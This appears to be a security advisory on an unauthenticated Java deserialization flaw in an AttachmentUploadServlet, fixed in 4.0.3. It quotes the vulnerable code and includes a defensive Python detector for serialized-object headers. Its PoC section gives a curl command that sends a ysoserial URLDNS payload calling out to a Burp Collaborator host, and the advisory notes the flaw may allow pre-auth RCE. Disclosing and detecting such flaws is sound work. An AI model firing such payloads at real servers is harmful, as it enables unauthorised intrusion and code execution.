Impacts

AttachmentUploadServlet deserializes untrusted data from the Attachment-Support header:
```java
protected void doPost(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException {
    String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
    AttachmentSupport attachmentSuppport = (AttachmentSupport) SerializationUtils
            .deserialize(Base64.decodeBase64(request.getHeader("Attachment-Support")));
    ...
}
```
This Servlet does not enforce any authentication or authorization checks.
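As an added, defender-side example (not part of the advisory or of the project's own code): the script below inspects request records and flags any hit on the advisory's unauthenticated `/attachment_upload` endpoint, plus any request header whose value base64-decodes to a Java serialization stream (every `ObjectOutputStream` starts with the bytes `AC ED 00 05`). The header-magic check generalizes beyond this one servlet to any endpoint that might accept serialized objects in a header. The request records and the "serialized" bytes are constructed samples, and the record field names (`src`, `path`, `headers`) are assumptions standing in for whatever proxy or access-log export you actually have.

```python
"""Flag requests that carry a base64-encoded Java serialization stream in a header,
the input shape AttachmentUploadServlet accepted before 4.0.3 (constructed example)."""
import base64
import binascii
from typing import Dict, List, Tuple

# Every Java ObjectOutputStream begins with STREAM_MAGIC (0xACED) and STREAM_VERSION (0x0005).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Endpoint and header named in the advisory.
VULNERABLE_PATH = "/attachment_upload"
VULNERABLE_HEADER = "Attachment-Support"


def base64_java_stream(value: str) -> bool:
    """True if `value` is valid base64 whose decoded bytes start with the Java stream header."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(JAVA_STREAM_MAGIC)


def inspect_request(req: Dict) -> List[str]:
    """Return the findings for one request record; an empty list means nothing suspicious."""
    findings: List[str] = []
    if req.get("path") == VULNERABLE_PATH:
        # The servlet enforces no authentication, so every hit on it deserves review.
        findings.append("request to unauthenticated deserialization endpoint")
    for name, value in req.get("headers", {}).items():
        # Header names are case-insensitive, so normalise before reporting.
        if base64_java_stream(value):
            findings.append(f"header {name.lower()} carries a Java serialization stream")
    return findings


def scan(requests: List[Dict]) -> List[Tuple[str, List[str]]]:
    """Return (source, findings) for every request that produced at least one finding."""
    results = []
    for req in requests:
        findings = inspect_request(req)
        if findings:
            results.append((req["src"], findings))
    return results


# Constructed sample traffic. The serialized bytes are the Java magic followed by
# placeholder text, not a gadget chain; the field names are assumptions.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "POST", "path": VULNERABLE_PATH,
     "headers": {"File-Name": "foo",
                 VULNERABLE_HEADER: base64.b64encode(JAVA_STREAM_MAGIC + b"constructed-placeholder").decode()}},
    {"src": "10.0.0.6", "method": "GET", "path": "/projects",
     "headers": {"Accept": "text/html"}},
    {"src": "10.0.0.7", "method": "POST", "path": "/api/upload",
     "headers": {"X-Token": base64.b64encode(b"opaque-session-token").decode()}},
]

if __name__ == "__main__":
    for src, findings in scan(SAMPLE_REQUESTS):
        print(src, "->", "; ".join(findings))
```

Only the first constructed request is reported, with two findings (the endpoint and the header); the ordinary base64 token in the third request decodes to bytes without the Java magic and is left alone. Validating the base64 strictly and checking the stream magic rather than the header name alone keeps the rule useful even if a client renames the header.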
PoC

Use ysoserial to generate a probe payload using the URLDNS gadget. This gadget will send a DNS request which we can intercept to prove the deserialization attack was successful.

```shell
curl -X POST http://localhost:6610/attachment_upload -H "File-Name: foo" -H "Attachment-Support: `java -jar /Users/pwntester/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://536mvpzmverok48wr06msp5du40uoj.burpcollaborator.net | base64`"
```
This issue may lead to pre-auth RCE.

Patches

This issue was fixed in 4.0.3 by removing AttachmentUploadServlet and not using deserialization.
Credits

This issue was discovered by @pwntester